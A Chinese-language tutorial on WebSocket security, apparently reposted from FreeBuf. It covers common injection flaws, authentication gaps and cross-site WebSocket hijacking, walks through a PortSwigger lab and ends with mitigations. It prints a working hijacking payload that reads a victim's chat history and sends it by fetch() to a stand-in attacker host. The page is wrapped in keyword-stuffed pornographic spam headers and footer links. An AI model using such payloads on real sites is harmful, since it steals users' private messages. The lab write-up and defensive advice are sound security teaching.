国产成人女人毛片视频在线-国产成人女人视频在线观看-国产成人女人在线观看-国产成人欧美-国产成人欧美日韩在线电影-国产成人欧美视频在线

銀行> 正文

WebSocket安全性分析,你看懂了嗎?

時間: 2023-06-27 20:29:29 來源: ???FreeBuf.COM
websocket簡介

WebSocket 是HTML5一種新的網(wǎng)絡(luò)傳輸協(xié)議,位于 OSI 模型的應(yīng)用層,可在單個TCP連接上進(jìn)行全雙工通信。WebSocket 建議于 TCP 協(xié)議之上,與 HTTP 協(xié)議有良好的兼容性。協(xié)議標(biāo)識符是ws;如果加密,則為wss。

WebSocket與HTTP的區(qū)別

HTTP協(xié)議時請求-響應(yīng)式的,一般是一個請求建立一次握手,在HTTP1.1版本開始,TCP連接可別復(fù)用。

HTTP協(xié)議只能由客戶端發(fā)送信息到服務(wù)端,服務(wù)端做出響應(yīng)。


(相關(guān)資料圖)

WebSocket通信是雙向的,既可以由客戶端發(fā)送信息,到服務(wù)端。也可以有服務(wù)端發(fā)送信息到客戶端。

WebSocket通信建立過程

websocket通常是由客戶端JavaScript腳本創(chuàng)建

var ws = new WebSocket("wss://normal-website.com/chat");

為了建立連接,會通過HTTP協(xié)議發(fā)送一個請求,告訴服務(wù)器接下來要使用websocket進(jìn)行通信,如果服務(wù)器同意請求,接下來就會進(jìn)行三次握手。

1686294004_6482cdf4d2e772119d075.png!small?1686294005590

WebSocket 握手消息的幾個特性值得注意:

請求和響應(yīng)中 的Connection和Upgrade標(biāo)頭表明這是一次 WebSocket 握手。

Sec-WebSocket-Version請求頭指定WebSocket協(xié)議版本的客戶端希望使用。通常是13.

Sec-WebSocket-Key請求報頭包含Base64編碼的隨機(jī)值,這應(yīng)該在每個握手請求是隨機(jī)產(chǎn)生的。并不是用于身份認(rèn)證的。

Sec-WebSocket-Accept響應(yīng)報頭包含在提交的值的散列Sec-WebSocket-Key請求頭,具有在協(xié)議規(guī)范中定義的特定的字符串串聯(lián)。這樣做是為了防止錯誤配置的服務(wù)器或緩存代理導(dǎo)致誤導(dǎo)性響應(yīng)。

三次握手以后表示建立了客戶端與服務(wù)端建立websocket連接,可以通過websocket協(xié)議進(jìn)行通信。

ws.send("hello websocket");

由于TCP協(xié)議是復(fù)用的,所以可以通過一次連接,發(fā)送多個信息。

1686294062_6482ce2ed13a9aa6a4f99.png!small?1686294063448

原則上,WebSocket 消息可以包含任何內(nèi)容或數(shù)據(jù)格式。在現(xiàn)代應(yīng)用程序中,通常使用 JSON 在 WebSocket 消息中發(fā)送結(jié)構(gòu)化數(shù)據(jù)。

WebSocket使用場景

基于WebSocket全雙工、延遲的特性,應(yīng)用場景比較廣泛。

聊天彈幕協(xié)同編輯股票報價實施更新位置更新直播實況段落的首行要WebSocket安全性分析

websocket僅僅是web程序中的一種通信協(xié)議,并不會解決web應(yīng)用中存在的安全問題。因此在HTTP協(xié)議中出現(xiàn)的安全問題在websocket中都可能出現(xiàn)。

目前對于HTTP協(xié)議的漏洞已經(jīng)很少了,可以去看看websocket協(xié)議的,說不定會有意想不到的發(fā)現(xiàn)。

1.常規(guī)漏洞

WebSocket中,用戶輸入可控的請求數(shù)據(jù),數(shù)據(jù)被服務(wù)端進(jìn)行處理,如果沒有進(jìn)行有限的校驗,可能出現(xiàn)常見的Web漏洞,如XSS、SQL Inject、RCE等。

如下圖,正常發(fā)送會發(fā)現(xiàn)進(jìn)行編碼

1686294500_6482cfe4560a520b4223c.png!small?1686294501018

可以直接抓包重放,改變值,成功利用。實際上跟http協(xié)議沒有什么區(qū)別。

1686294509_6482cfed974210c835d07.png!small?1686294510349

2.權(quán)限

認(rèn)證

websocket協(xié)議沒有規(guī)定在服務(wù)器在握手階段應(yīng)該如何認(rèn)證客戶端身份。服務(wù)器可以采用任何 HTTP 服務(wù)器的客戶端身份認(rèn)證機(jī)制,如 cookie認(rèn)證,HTTP 基礎(chǔ)認(rèn)證,TLS 身份認(rèn)證等。

因此,認(rèn)證實現(xiàn)方面的安全問題與基于HTTP的Web認(rèn)證并無區(qū)別。

如CVE-2015-0201,Spring框架的Java SockJS客戶端生成可預(yù)測的會話ID,攻擊者可利用該漏洞向其他會話發(fā)送消息

授權(quán)

WebSocket 協(xié)議依然沒有指定任何授權(quán)方式,因此關(guān)于權(quán)限的相關(guān)策略依然得依賴開發(fā)者在服務(wù)端實現(xiàn),這就說明通過websocket協(xié)議與傳統(tǒng)的http協(xié)議面臨相同的安全風(fēng)險,如垂直越權(quán)和水平越權(quán)。

3.基于webSocket的CSRF漏洞(跨域請求/CSWSH)

該漏洞全稱叫做Cross-site WebSocket Hijacking,跨站點WebSocket劫持漏洞。當(dāng)WebSocket握手請求僅依靠HTTP cookie進(jìn)行會話處理并且不包含任何CSRF token或其他不可預(yù)測的值時,就會出現(xiàn)這種漏洞。

判斷websocket中是否存在跨域問題

檢查應(yīng)用程序執(zhí)行的WebSocket握手過程是否針對CSRF進(jìn)行了保護(hù)。除了在cookie中該消息不依賴其它的值進(jìn)行會話處理。如下面的請求僅僅依靠session token來進(jìn)行會話處理,那么就會存在這種漏洞。

1686294535_6482d00739e9ede4566c2.png!small?1686294536047

通過portSwigger的靶場進(jìn)行復(fù)現(xiàn)

Lab: Cross-site WebSocket hijacking

在live chat中首先驗證websocket是否存在csrf。可以看到僅僅依靠cookie來進(jìn)行會話處理,說明存在漏洞

1686294558_6482d01e0724a95846cbd.png!small?1686294558694

在確認(rèn)存在這個漏洞以后,我們就要去編寫我們的payload,首先我們發(fā)現(xiàn)在建立websocket連接以后,發(fā)送READY字符串,服務(wù)端就會把歷史聊天記錄返回,那么我們就通過這種方式去利用。

1686294563_6482d023a161e00440e69.png!small?1686294564415

首先通過new websocket與服務(wù)端建立連接,然后通過ws.send("READY")像服務(wù)端發(fā)送READY。當(dāng)服務(wù)端收到READY字符串時,就會把歷史的聊天記錄返回回來。這個js收到歷史記錄以后就可以訪問burp的collaborator并帶著敏感數(shù)據(jù)。

payload如下:

<script>// Create WebSocket connection.var ws = new WebSocket("wss://web-security-academy.net/chat");// Connection openedws.addEventListener("open", function (event) {ws.send("READY");});// Listen for messagesws.onmessage = function(event) {fetch("https://you-site.net/?log"+event.data, {mode: "no-cors"})};</script>

在portSwigger的exploit server中設(shè)置自己的payload

1686294605_6482d04dba51aab951f35.png!small?1686294606435

設(shè)置好payload,然后讓登錄的瀏覽器去訪問。在這個靶場也就是點擊Deliver exploit to victim

1686294621_6482d05d0608dbe4d74c2.png!small?1686294621581

然后再burp上就可以看到信息

1686294630_6482d0667a6b0b8527711.png!small?1686294631105

這種漏洞的一種修復(fù)方式就是在服務(wù)端驗證Origin頭,如果客戶端發(fā)來的 Origin 信息來自不同域,服務(wù)器端可以拒絕該請求。但是僅僅檢查 Origin 仍然是不夠安全的,惡意網(wǎng)頁可以偽造Origin頭信息,繞過服務(wù)端對Origin頭的檢查,更完善的解決方案可以借鑒CSRF的解決方案-令牌機(jī)制。

websocket安全問題如何預(yù)防正確驗證輸入輸出的數(shù)據(jù),跟http協(xié)議一樣使用CSRF Token、請求頭令牌等方案保護(hù)WebSocket握手流程,防止WebSocket握手流程被CSRF攻擊所利用。使用wss://協(xié)議,(基于TLS的Websockets)在服務(wù)器進(jìn)行授權(quán),防止越權(quán)的產(chǎn)生。參考鏈接

https://www.freebuf.com/articles/web/336291.html

https://security.tencent.com/index.php/blog/msg/119

https://freebuf.com/vuls/328279.html

關(guān)鍵詞:

責(zé)任編輯:QL0009

為你推薦

關(guān)于我們| 聯(lián)系我們| 投稿合作| 法律聲明| 廣告投放

版權(quán)所有 © 2020 跑酷財經(jīng)網(wǎng)

所載文章、數(shù)據(jù)僅供參考,使用前務(wù)請仔細(xì)閱讀網(wǎng)站聲明。本站不作任何非法律允許范圍內(nèi)服務(wù)!

聯(lián)系我們:315 541 [email protected]

主站蜘蛛池模板: 毛片成人 | 91香蕉国| 国产亚洲精品久久久久秋霞 | 加勒比无码中出人妻 | 97人妻免费在线视频中文 | 91精品福利视频在线观看 | 97精品无码永久在线 | 中文字幕精品 | 亚洲欧美视频一区二 | 99国产精品99 | 一级做a爱全免费视频免费 一级做a爰片 | 天美麻豆成人av精品视频 | 九九热在线视频 | 无码一区二区三区中文字幕 | 一级呦女专区毛片 | 成年福利片在线观看 | 97人妻免 | 亚洲av日韩av天堂影片精品 | 亚洲欧美黄色站在线观看 | 黄色视频免费亚洲 | 国产欧美日韩一区二区三区 | 亚洲av成人精品一区二区三区 | 丝袜国产高跟在线一区 | 中文字幕亚洲乱码高清 | 久久99精品国产99久久 | 中文无码肉感爆乳在线观看 | 亚洲国人久久精品 | 国产高清无码在线播放 | 国语精品91自产拍在线观看一区 | 国产成人啪精品视频免费网 | 亚洲国产精品va在线观看香蕉 | 高潮国产白浆抽搐福利日本 | 色综合天天视频在 | 欧美成人午夜精品一区二区 | 国产人妻精品一区二区三区不卡 | 加勒比在线一区二区三区 | 91在线精品秘一区二区稳居榜首 | 99久久深夜中文字幕五月婷 | 99久久99久久精品免费看蜜桃 | 亚洲国产一区二区在线观看 | 国产精品成人亚洲一区二区 |